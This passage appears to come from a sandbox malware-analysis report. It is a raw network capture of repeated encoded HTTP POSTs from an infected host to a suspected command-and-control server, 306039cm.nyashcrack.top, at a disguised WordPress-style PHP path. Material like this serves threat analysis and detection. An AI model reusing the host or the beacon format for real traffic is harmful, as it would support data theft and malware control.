                                                                                              Dec 9, 2024 16:02:03.781613111 CET1040OUTData Raw: 59 5d 5b 55 5f 41 59 5b 5c 5c 56 57 50 5a 5b 59 5f 5b 59 5d 56 5a 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y][U_AY[\\VWPZ[Y_[Y]VZQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /T1 :*#;29V?43;!(%:W4?+$A(>/_*:&^#,X /
                                                                                              Dec 9, 2024 16:02:04.715818882 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:04.941869974 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              25192.168.2.44994137.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:05.181252956 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:05.532155037 CET1040OUTData Raw: 5c 58 5e 5e 5f 45 59 5d 5c 5c 56 57 50 51 5b 5e 5f 5b 59 59 56 5c 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \X^^_EY]\\VWPQ[^_[YYV\QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#/6!\)Y $1++?'(!\)%) /+)0B>=<?:&^#,X


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              26192.168.2.44994537.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:06.388338089 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1732
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:06.734760046 CET1732OUTData Raw: 5c 58 5b 53 5f 46 5c 5c 5c 5c 56 57 50 50 5b 51 5f 5c 59 59 56 52 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \X[S_F\\\\VWPP[Q_\YYVRQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#829!:\#6#&(W+(X')6.",2W?)?$**&^#,X
                                                                                              Dec 9, 2024 16:02:07.658607006 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:07.918591976 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 24 53 23 26 0d 1d 22 01 20 56 2d 04 25 1e 22 2f 23 17 28 00 23 5b 25 30 20 07 2c 01 0f 0c 22 55 29 07 28 32 30 55 2b 32 3f 0a 21 1f 21 5a 06 1e 25 5d 33 3d 0a 1d 2c 22 28 58 3c 0f 32 16 34 3e 27 5d 24 23 20 1d 32 2f 33 07 24 2f 38 0a 2f 1d 25 0c 29 58 23 08 3c 3c 2c 01 24 3f 2b 53 0e 1f 23 04 2a 1f 3d 57 3c 3e 24 0f 22 2f 28 53 26 58 2e 54 25 0b 3f 08 3c 3a 39 55 2b 33 3f 1e 37 03 02 52 31 3c 25 5e 3c 01 30 0a 24 33 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: $S#&" V-%"/#(#[%0 ,"U)(20U+2?!!Z%]3=,"(X<24>']$# 2/3$/8/%)X#<<,$?+S#*=W<>$"/(S&X.T%?<:9U+3?7R1<%^<0$3 ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              27192.168.2.44994637.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:06.509105921 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:06.859740973 CET1040OUTData Raw: 59 5b 5b 53 5f 40 59 5e 5c 5c 56 57 50 5e 5b 59 5f 5d 59 5e 56 5e 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y[[S_@Y^\\VWP^[Y_]Y^V^QWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B8&\!*!_"5;')S?&(%Z=%R#U(*+<=?_(*&^#,X
                                                                                              Dec 9, 2024 16:02:07.778985977 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:08.171662092 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:07 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              28192.168.2.44995137.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:08.473742962 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:02:08.828561068 CET1040OUTData Raw: 59 59 5e 5e 5f 43 5c 58 5c 5c 56 57 50 5f 5b 5d 5f 5d 59 5a 56 5b 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YY^^_C\X\\VWP_[]_]YZV[Q_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#85 )" ;')<7+05*>",6P++>=_(*&^#,X ;
                                                                                              Dec 9, 2024 16:02:09.746181011 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:09.981959105 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:08 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              29192.168.2.44995737.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:10.227649927 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:10.578520060 CET1040OUTData Raw: 5c 5d 5e 56 5f 4b 59 5b 5c 5c 56 57 50 5a 5b 51 5f 5d 59 5e 56 52 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \]^V_KY[\\VWPZ[Q_]Y^VRQVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B,""\"*- ['*(? X085**Q#/<9?>.'\(:&^#,X /
                                                                                              Dec 9, 2024 16:02:11.573611021 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:11.799288034 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              30192.168.2.44996337.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:12.040199041 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:12.390945911 CET1040OUTData Raw: 5c 5e 5b 53 5f 4a 59 5a 5c 5c 56 57 50 50 5b 58 5f 51 59 5c 56 5d 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \^[S_JYZ\\VWPP[X_QY\V]QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D82) :)^#2)4+$$5Y(%)41+)0@?#_+&^#,X


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              31192.168.2.44996537.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:13.047301054 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1756
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:13.406625986 CET1756OUTData Raw: 59 59 5b 53 5f 4b 59 5a 5c 5c 56 57 50 5f 5b 5a 5f 5c 59 5c 56 53 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YY[S_KYZ\\VWP_[Z_\Y\VSQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P -"&["-Y &(&T(4]'^5Y*&"W75?94D(['?&^#,X ;
                                                                                              Dec 9, 2024 16:02:14.318631887 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:14.553776026 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 27 0d 21 35 3f 12 36 16 24 57 3a 03 2e 05 21 3c 23 15 3c 07 38 04 32 0a 23 17 2c 11 32 1c 21 0d 39 03 2b 1f 34 52 3f 0f 09 0b 21 25 21 5a 06 1e 25 5d 30 03 3c 54 2d 21 27 04 28 0f 2d 07 37 00 0e 07 27 55 37 0c 27 2f 0e 59 25 2c 27 53 2c 55 31 0e 3e 3d 23 08 3f 3c 27 5a 24 3f 2b 53 0e 1f 23 03 29 31 32 0c 29 3e 24 0a 21 11 05 0d 26 3d 35 0f 26 21 2c 55 28 2a 18 0c 3f 0a 2b 52 34 3e 3c 57 25 05 2e 06 3e 2f 2c 0b 25 09 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: '!5?6$W:.!<#<82#,2!9+4R?!%!Z%]0<T-!'(-7'U7'/Y%,'S,U1>=#?<'Z$?+S#)12)>$!&=5&!,U(*?+R4><W%.>/,% ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              32192.168.2.44996637.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:13.171066999 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:13.516032934 CET1040OUTData Raw: 59 5b 5e 50 5a 43 59 58 5c 5c 56 57 50 5b 5b 59 5f 5e 59 59 56 53 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y[^PZCYX\\VWP[[Y_^YYVSQXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P C85>454Z':,+]$;)Y>%.S 1+)$@<.'**&^#,X +
                                                                                              Dec 9, 2024 16:02:14.442814112 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:14.677802086 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              33192.168.2.44997137.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:14.920442104 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:02:15.265995979 CET1040OUTData Raw: 5c 5d 5b 53 5f 4b 59 59 5c 5c 56 57 50 50 5b 58 5f 5d 59 5d 56 59 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \][S_KYY\\VWPP[X_]Y]VYQ[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E/2""%X#S$')3< \0Z*27<2<'(0<&^#,X
                                                                                              Dec 9, 2024 16:02:16.215329885 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:16.449781895 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:15 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              34192.168.2.44997737.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:16.696455956 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:17.047188044 CET1040OUTData Raw: 59 54 5b 55 5f 45 59 5f 5c 5c 56 57 50 5a 5b 5a 5f 59 59 5f 56 58 51 5e 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YT[U_EY_\\VWPZ[Z_YY_VXQ^XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E/ *^"%;%#(7?&(:*5= P()0<Z(&^#,X /
                                                                                              Dec 9, 2024 16:02:17.966264963 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:18.201807976 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              35192.168.2.44998237.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:18.447242022 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:18.797169924 CET1040OUTData Raw: 59 5e 5b 53 5f 44 59 58 5c 5c 56 57 50 5e 5b 51 5f 51 59 58 56 53 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y^[S_DYX\\VWP^[Q_QYXVSQ_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#,26\!:)7%<'),V(8\389Y=624P+<B??<&^#,X


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              36192.168.2.44998537.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:19.683983088 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1720
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:20.032031059 CET1720OUTData Raw: 59 5f 5b 52 5a 41 59 5d 5c 5c 56 57 50 59 5b 51 5f 59 59 5f 56 5f 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y_[RZAY]\\VWPY[Q_YY_V_QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;2569!]754%<U<'<\$=69#?2(<C<_+*&^#,X
                                                                                              Dec 9, 2024 16:02:20.967525959 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:21.185417891 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:20 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 24 52 35 25 2f 59 35 38 3c 1f 3a 3e 25 5c 22 12 38 05 3f 00 01 5b 24 33 09 5e 38 2c 3e 50 36 33 31 06 2b 57 3b 0e 28 0f 20 1e 35 35 21 5a 06 1e 25 5c 26 3d 0e 1e 2d 21 3c 5b 2b 57 36 5f 34 07 2f 17 24 0d 3f 0e 25 2c 24 5c 24 01 3f 52 3b 0d 25 0c 29 58 37 45 2b 11 28 06 24 2f 2b 53 0e 1f 23 03 3d 1f 22 0a 3c 2e 3f 53 22 01 24 57 26 3e 36 1d 26 32 0a 19 3c 2a 3d 1f 3f 20 37 57 34 13 3f 08 31 3c 03 58 3c 06 2f 14 25 33 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: $R5%/Y58<:>%\"8?[$3^8,>P631+W;( 55!Z%\&=-!<[+W6_4/$?%,$\$?R;%)X7E+($/+S#="<.?S"$W&>6&2<*=? 7W4?1<X</%3 ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              37192.168.2.44998637.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:19.810553074 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:02:20.159682035 CET1040OUTData Raw: 59 5c 5e 50 5a 40 59 52 5c 5c 56 57 50 5a 5b 5a 5f 51 59 59 56 5d 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y\^PZ@YR\\VWPZ[Z_QYYV]QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /25!*%] 4&_,U<$38)=6- 2+9?<;?*&^#,X /
                                                                                              Dec 9, 2024 16:02:21.082212925 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:21.321890116 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:20 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
